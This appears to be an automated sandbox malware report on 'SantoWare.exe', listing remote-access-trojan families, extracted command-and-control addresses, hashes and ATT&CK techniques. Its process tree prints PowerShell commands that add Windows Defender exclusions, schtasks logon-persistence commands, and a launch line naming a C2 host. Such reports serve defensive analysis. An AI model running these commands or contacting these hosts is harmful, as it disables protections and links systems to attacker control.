arrowrat | 164cf475b4a37a4c142125bdc1808f4bc5f0f8f1efa555c65609b83b1704a7b9

Analysis

max time kernel
150s
max time network
136s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05/12/2024, 18:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SantoWare.exe
Size

8.1MB
MD5

9146e533d8cdfdfd620e221d6b0c8fb0
SHA1

0e2e6ae26b93d62bc6e439b98ab278fd9f877c22
SHA256

164cf475b4a37a4c142125bdc1808f4bc5f0f8f1efa555c65609b83b1704a7b9
SHA512

a73bd811f10dee9035eb075ef4487c21c5de231e725311d3638655cc723681cf419f5d0bbcc4e0557bd6e2d3e71c52fedfe5bbde8ca09a62728249132fa23d59
SSDEEP

196608:S8HXVmgfjPEbX2bVj180+qWc67W21Jn2khSs50CG11:S8HXY+zEz2JZ80jv6b1JjEAGv

Score

10^/10

arrowrat asyncrat venomrat xworm default discordcclient execution persistence rat trojan upx

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

147.185.221.24:18891

Mutex

ojozazfbghcdrrcaa

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

ma-compile.gl.at.ply.gg:18894

Mutex

RJpwA4Zvno655gyq

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

arrowrat

Botnet

DiscordCClient

know-england.gl.at.ply.gg:18903

Mutex

vlCHETDFA

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
Arrowrat family
arrowrat
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/2644-30-0x0000000000930000-0x0000000000940000-memory.dmp	family_xworm
behavioral1/files/0x000a0000000120f1-28.dat	family_xworm

VenomRAT 2 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral1/files/0x00120000000054a9-13.dat	VenomRAT
behavioral1/memory/2912-15-0x0000000000150000-0x0000000000168000-memory.dmp	VenomRAT

Venomrat family
venomrat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x00120000000054a9-13.dat	family_asyncrat

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe
328	powershell.exe
1312	powershell.exe
2396	powershell.exe
2764	powershell.exe
2688	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2912	DiscordVcClient.exe
2644	DiscordXClient.exe
2444	Client.exe
3068	Built.exe
2588	Built.exe

Loads dropped DLL 9 IoCs

pid	Process
2408	SantoWare.exe
2588	Built.exe
2588	Built.exe
2588	Built.exe
2588	Built.exe
2588	Built.exe
2588	Built.exe
2588	Built.exe
1196	Process not Found

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\DiscordVcClient = "C:\\Windows\\System32\\DiscordVcClient.exe"	SantoWare.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\DiscordXClient = "C:\\Windows\\System32\\DiscordXClient.exe"	SantoWare.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Windows\\System32\\Client.exe"	SantoWare.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Built = "C:\\Windows\\System32\\Built.exe"	SantoWare.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\System32\DiscordVcClient.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\DiscordVcClient.exe	SantoWare.exe
File created	C:\Windows\System32\DiscordXClient.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\DiscordXClient.exe	SantoWare.exe
File created	C:\Windows\System32\Client.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\Client.exe	SantoWare.exe
File created	C:\Windows\System32\Built.exe	SantoWare.exe
File opened for modification	C:\Windows\System32\Built.exe	SantoWare.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001a466-129.dat	upx
behavioral1/memory/2588-131-0x000007FEF2120000-0x000007FEF270E000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 5 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3028	schtasks.exe
2564	schtasks.exe
2860	schtasks.exe
2892	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2396	powershell.exe
2764	powershell.exe
2688	powershell.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2796	powershell.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2444	Client.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
328	powershell.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe
2912	DiscordVcClient.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	2912	DiscordVcClient.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2444	Client.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeDebugPrivilege	2644	DiscordXClient.exe
Token: SeDebugPrivilege	328	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	2644	DiscordXClient.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe
Token: SeShutdownPrivilege	2980	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe
2980	explorer.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2444	Client.exe
2912	DiscordVcClient.exe
2644	DiscordXClient.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2408 wrote to memory of 2396	2408	SantoWare.exe	30
PID 2408 wrote to memory of 2396	2408	SantoWare.exe	30
PID 2408 wrote to memory of 2396	2408	SantoWare.exe	30
PID 2408 wrote to memory of 2860	2408	SantoWare.exe	32
PID 2408 wrote to memory of 2860	2408	SantoWare.exe	32
PID 2408 wrote to memory of 2860	2408	SantoWare.exe	32
PID 2408 wrote to memory of 2912	2408	SantoWare.exe	34
PID 2408 wrote to memory of 2912	2408	SantoWare.exe	34
PID 2408 wrote to memory of 2912	2408	SantoWare.exe	34
PID 2408 wrote to memory of 2764	2408	SantoWare.exe	35
PID 2408 wrote to memory of 2764	2408	SantoWare.exe	35
PID 2408 wrote to memory of 2764	2408	SantoWare.exe	35
PID 2408 wrote to memory of 2892	2408	SantoWare.exe	37
PID 2408 wrote to memory of 2892	2408	SantoWare.exe	37
PID 2408 wrote to memory of 2892	2408	SantoWare.exe	37
PID 2408 wrote to memory of 2644	2408	SantoWare.exe	39
PID 2408 wrote to memory of 2644	2408	SantoWare.exe	39
PID 2408 wrote to memory of 2644	2408	SantoWare.exe	39
PID 2408 wrote to memory of 2688	2408	SantoWare.exe	40
PID 2408 wrote to memory of 2688	2408	SantoWare.exe	40
PID 2408 wrote to memory of 2688	2408	SantoWare.exe	40
PID 2408 wrote to memory of 3028	2408	SantoWare.exe	42
PID 2408 wrote to memory of 3028	2408	SantoWare.exe	42
PID 2408 wrote to memory of 3028	2408	SantoWare.exe	42
PID 2408 wrote to memory of 2444	2408	SantoWare.exe	44
PID 2408 wrote to memory of 2444	2408	SantoWare.exe	44
PID 2408 wrote to memory of 2444	2408	SantoWare.exe	44
PID 2408 wrote to memory of 2796	2408	SantoWare.exe	45
PID 2408 wrote to memory of 2796	2408	SantoWare.exe	45
PID 2408 wrote to memory of 2796	2408	SantoWare.exe	45
PID 2444 wrote to memory of 2980	2444	Client.exe	47
PID 2444 wrote to memory of 2980	2444	Client.exe	47
PID 2444 wrote to memory of 2980	2444	Client.exe	47
PID 2444 wrote to memory of 2968	2444	Client.exe	48
PID 2444 wrote to memory of 2968	2444	Client.exe	48
PID 2444 wrote to memory of 2968	2444	Client.exe	48
PID 2444 wrote to memory of 2968	2444	Client.exe	48
PID 2444 wrote to memory of 3020	2444	Client.exe	49
PID 2444 wrote to memory of 3020	2444	Client.exe	49
PID 2444 wrote to memory of 3020	2444	Client.exe	49
PID 2444 wrote to memory of 3020	2444	Client.exe	49
PID 2444 wrote to memory of 1676	2444	Client.exe	50
PID 2444 wrote to memory of 1676	2444	Client.exe	50
PID 2444 wrote to memory of 1676	2444	Client.exe	50
PID 2444 wrote to memory of 1676	2444	Client.exe	50
PID 2444 wrote to memory of 1864	2444	Client.exe	51
PID 2444 wrote to memory of 1864	2444	Client.exe	51
PID 2444 wrote to memory of 1864	2444	Client.exe	51
PID 2444 wrote to memory of 1864	2444	Client.exe	51
PID 2444 wrote to memory of 2700	2444	Client.exe	52
PID 2444 wrote to memory of 2700	2444	Client.exe	52
PID 2444 wrote to memory of 2700	2444	Client.exe	52
PID 2444 wrote to memory of 2700	2444	Client.exe	52
PID 2444 wrote to memory of 1736	2444	Client.exe	53
PID 2444 wrote to memory of 1736	2444	Client.exe	53
PID 2444 wrote to memory of 1736	2444	Client.exe	53
PID 2444 wrote to memory of 1736	2444	Client.exe	53
PID 2444 wrote to memory of 1056	2444	Client.exe	54
PID 2444 wrote to memory of 1056	2444	Client.exe	54
PID 2444 wrote to memory of 1056	2444	Client.exe	54
PID 2444 wrote to memory of 1056	2444	Client.exe	54
PID 2444 wrote to memory of 1600	2444	Client.exe	55
PID 2444 wrote to memory of 1600	2444	Client.exe	55
PID 2444 wrote to memory of 1600	2444	Client.exe	55

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\SantoWare.exe
"C:\Users\Admin\AppData\Local\Temp\SantoWare.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordVcClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2396
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordVcClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordVcClient.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2860
- C:\Windows\System32\DiscordVcClient.exe
  "C:\Windows\System32\DiscordVcClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2764
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordXClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordXClient.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2892
- C:\Windows\System32\DiscordXClient.exe
  "C:\Windows\System32\DiscordXClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DiscordXClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Client.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "Client" /SC ONLOGON /TR "C:\Windows\System32\Client.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3028
- C:\Windows\System32\Client.exe
  "C:\Windows\System32\Client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2980
  - - C:\Windows\system32\ctfmon.exe
      ctfmon.exe
      4⤵
      PID:2080
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:2968
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:3020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:2700
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1736
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1056
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1600
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:1656
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA
    3⤵
    PID:844
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2444 -s 664
    3⤵
    PID:2328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2564
- C:\Windows\System32\Built.exe
  "C:\Windows\System32\Built.exe"
  2⤵
  - Executes dropped EXE
  PID:3068
- - C:\Windows\System32\Built.exe
    "C:\Windows\System32\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI30682\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
1c58526d681efe507deb8f1935c75487

SHA1
0e6d328faf3563f2aae029bc5f2272fb7a742672

SHA256
ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

SHA512
8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30682\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30682\python311.dll

Filesize
1.6MB

MD5
76eb1ad615ba6600ce747bf1acde6679

SHA1
d3e1318077217372653be3947635b93df68156a4

SHA256
30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1

SHA512
2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30682\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b1efc2c5878fb1229878ad5369c28b17

SHA1
0625070b13ca7c197f07b586f20dda99e8b3e5a0

SHA256
51c00a3dec3765e2bef4bddbab0825c2b21fb1c985b114a3a697482fb6d2c2f8

SHA512
d95b17d362e3d9b37b27d9574293066a7ae92547a5bf54598189f695589ef7436c078be26205929dd9fcdefe512afef4990e743bbe45e083756b33de66413b0d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fca1fadff469090f8771e17fff94d6b9

SHA1
bc4191236f2b1b06da03222c0756f11c93148525

SHA256
3d8c90d1e3a0748eae7989ea3424e457c24fe37b06a9ea45615d41b19f6e9875

SHA512
91e2a79569dc981b95c93eeafb1427df3828ea8457ac73bebf519718e2e19ea099aa2e74e0892d377d193f7c93ac24d193523204f3b61655a9bfd1bd4fb9cea0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9JY41S7LYTYBT12FSL6O.temp

Filesize
7KB

MD5
8eda4477a7925a1c5fd519ecc0657e2a

SHA1
8b41b9ed506017b08ecc642f36c2bedb3941cba7

SHA256
56f659f4340849d2ccfd121217ff20ace0abdaea2f152fcd069932db2f5d7e5e

SHA512
4239be7faad4167a3a35afe08fca0554f88fb6b0d22d9948beca198bcc973eb6387f43b6e88cb35c29cf0857938fc61b4f3f4e1b2dc1ef4475fcf30f83e47c0c

Download Submit
C:\Windows\System32\Client.exe

Filesize
158KB

MD5
99824baab1676a2ed1e898090cb0fcc1

SHA1
951617c54e68a221da776add3264450f8a2255cb

SHA256
a88efa6dea3c898d55f882ce0143518b9da2883496e5fc448c791f328d13e82d

SHA512
218c5a899b063ccae1ac02d3e8abe9b6e3d307573c0363d01e1bb3626ce090aaa08a2a7cec33cfce6abd115dc39964048d1dc8320fd143af9ef651d92edc072a

Download Submit
C:\Windows\System32\DiscordVcClient.exe

Filesize
74KB

MD5
d6adfa25699c74bc456c1b255fea81df

SHA1
fc9e822263308909409a8429004ad4a2249124ff

SHA256
a34d9f25edb98b2cf95879380b52c59d857c22929b327f2b1cac64ab86beb2c5

SHA512
ae987008e8f39bc489373d602a79e91321603c400fa3ba982fc99af1baf2461bfeab5bed5c1b26f06f5bf328a565a89187c0b310d5bc69228d5191d36313bcfd

Download Submit
C:\Windows\System32\DiscordXClient.exe

Filesize
37KB

MD5
582bba7b8005d6c324b945a19e6d6c16

SHA1
9a8f6c7fa7bb46689e6d146e1b070c70ec14c36f

SHA256
671866f3a944ee4f0419d188539a85e43742e04fbde5131b51848fad44e2719c

SHA512
0616d371f8d4ed2ff64077fcd8f49c7abec432fe3e3d8bbf84cba82c631a009a9acdba69a54135bb0b672c1fa9afcec165b1caab23c1fdd79a555acc893e04d3

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI30682\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
724223109e49cb01d61d63a8be926b8f

SHA1
072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

SHA256
4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

SHA512
19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI30682\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI30682\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
d12403ee11359259ba2b0706e5e5111c

SHA1
03cc7827a30fd1dee38665c0cc993b4b533ac138

SHA256
f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

SHA512
9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

Download Submit
\Windows\System32\Built.exe

Filesize
8.1MB

MD5
89dd023a703e12d4e2a4686d02abe286

SHA1
9681f55084c7c292acfe26a979f8e04d80efc1ff

SHA256
d008401e82c6dba813720416672a6dde33dd214438ed389fc08fdbead3540ed4

SHA512
a8f20e05603d0aaba36c5cb856c4ffc0f93ffc9685919638961ae0305f097bfe7d913bc7b283378e93cc9ae7a3edb678b98d0a6645638f7e858984d26a3c6197

Download Submit
memory/2396-8-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
